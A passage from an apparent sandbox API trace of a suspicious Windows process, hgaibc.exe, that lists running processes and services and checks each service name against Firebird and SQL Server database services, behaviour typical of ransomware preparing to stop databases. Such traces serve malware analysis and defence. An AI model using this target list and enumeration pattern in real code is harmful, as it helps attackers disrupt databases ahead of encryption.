(lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0196.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0196.212] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0196.212] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0196.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0196.212] lstrlenW (lpString="SamSs") returned 5 [0196.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0196.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0196.212] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0196.212] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0196.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0196.213] lstrlenW (lpString="Schedule") returned 8 [0196.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0196.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0196.213] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0196.213] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0196.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0196.213] lstrlenW (lpString="SecurityHealthService") returned 21 [0196.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0196.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0196.213] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0196.213] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0196.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0196.213] lstrlenW (lpString="SENS") returned 4 [0196.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0196.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0196.213] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0196.213] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0196.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0196.213] lstrlenW (lpString="ShellHWDetection") returned 16 [0196.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0196.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0196.213] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0196.213] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0196.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0196.213] lstrlenW (lpString="Spooler") returned 7 [0196.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0196.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0196.213] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0196.213] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0196.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0196.213] lstrlenW (lpString="StateRepository") returned 15 [0196.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0196.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0196.214] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0196.214] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0196.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0196.214] lstrlenW (lpString="SysMain") returned 7 [0196.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0196.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0196.214] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0196.214] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0196.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0196.214] lstrlenW (lpString="SystemEventsBroker") returned 18 [0196.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0196.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0196.214] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0196.214] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0196.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0196.214] lstrlenW (lpString="Themes") returned 6 [0196.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0196.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0196.214] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0196.214] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0196.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0196.214] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0196.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0196.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0196.214] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0196.214] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0196.215] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x368 [0196.219] Process32FirstW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.220] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0196.220] lstrlenW (lpString="System") returned 6 [0196.220] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0196.221] lstrlenW (lpString="smss.exe") returned 8 [0196.221] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0196.532] lstrlenW (lpString="csrss.exe") returned 9 [0196.533] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0196.533] lstrlenW (lpString="wininit.exe") returned 11 [0196.533] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0196.549] lstrlenW (lpString="csrss.exe") returned 9 [0196.550] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0196.551] lstrlenW (lpString="winlogon.exe") returned 12 [0196.551] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0196.552] lstrlenW (lpString="services.exe") returned 12 [0196.552] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0196.552] lstrlenW (lpString="lsass.exe") returned 9 [0196.552] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0196.553] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0196.553] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0196.554] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0196.554] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.555] lstrlenW (lpString="svchost.exe") returned 11 [0196.555] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.556] lstrlenW (lpString="svchost.exe") returned 11 [0196.556] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0196.556] lstrlenW (lpString="dwm.exe") returned 7 [0196.556] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.557] lstrlenW (lpString="svchost.exe") returned 11 [0196.557] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.558] lstrlenW (lpString="svchost.exe") returned 11 [0196.558] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.559] lstrlenW (lpString="svchost.exe") returned 11 [0196.559] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.559] lstrlenW (lpString="svchost.exe") returned 11 [0196.560] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.560] lstrlenW (lpString="svchost.exe") returned 11 [0196.560] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.561] lstrlenW (lpString="svchost.exe") returned 11 [0196.561] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.562] lstrlenW (lpString="svchost.exe") returned 11 [0196.562] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.563] lstrlenW (lpString="svchost.exe") returned 11 [0196.563] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.563] lstrlenW (lpString="svchost.exe") returned 11 [0196.564] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.564] lstrlenW (lpString="svchost.exe") returned 11 [0196.564] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0196.565] lstrlenW (lpString="spoolsv.exe") returned 11 [0196.565] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.566] lstrlenW (lpString="svchost.exe") returned 11 [0196.566] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0196.567] lstrlenW (lpString="audiodg.exe") returned 11 [0196.567] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0196.567] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0196.568] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0196.568] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0196.568] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0196.569] lstrlenW (lpString="Memory Compression") returned 18 [0196.569] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0196.570] lstrlenW (lpString="sihost.exe") returned 10 [0196.570] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.571] lstrlenW (lpString="svchost.exe") returned 11 [0196.571] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0196.572] lstrlenW (lpString="msoia.exe") returned 9 [0196.572] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0196.572] lstrlenW (lpString="taskhostw.exe") returned 13 [0196.572] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.573] lstrlenW (lpString="explorer.exe") returned 12 [0196.573] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0196.574] lstrlenW (lpString="SearchUI.exe") returned 12 [0196.574] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0196.575] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0196.575] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0196.576] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0196.576] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0196.576] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0196.576] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0196.577] lstrlenW (lpString="hgaibc.exe") returned 10 [0196.577] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0196.590] CloseHandle (hObject=0x368) returned 1 [0196.590] Sleep (dwMilliseconds=0x1f4) [0197.298] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6beef8 [0197.299] EnumServicesStatusExW (in: hSCManager=0x6beef8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0197.300] GetLastError () returned 0xea [0197.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6d97a8 [0197.300] EnumServicesStatusExW (in: hSCManager=0x6beef8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d97a8, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d97a8, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0197.301] CloseServiceHandle (hSCObject=0x6beef8) returned 1 [0197.301] lstrlenW (lpString="Appinfo") returned 7 [0197.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0197.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0197.301] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0197.301] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0197.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0197.301] lstrlenW (lpString="AppXSvc") returned 7 [0197.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0197.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0197.301] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0197.301] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0197.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0197.301] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0197.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0197.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0197.301] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0197.301] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0197.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0197.301] lstrlenW (lpString="Audiosrv") returned 8 [0197.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0197.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0197.301] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0197.301] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0197.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0197.301] lstrlenW (lpString="BFE") returned 3 [0197.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0197.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0197.302] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0197.302] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0197.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0197.302] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0197.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0197.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0197.302] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0197.302] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0197.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0197.302] lstrlenW (lpString="CDPSvc") returned 6 [0197.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0197.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0197.302] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0197.302] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0197.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0197.302] lstrlenW (lpString="ClickToRunSvc") returned 13 [0197.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0197.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0197.302] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0197.302] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0197.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0197.302] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0197.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0197.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0197.302] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0197.302] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0197.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0197.302] lstrlenW (lpString="CryptSvc") returned 8 [0197.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0197.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0197.302] 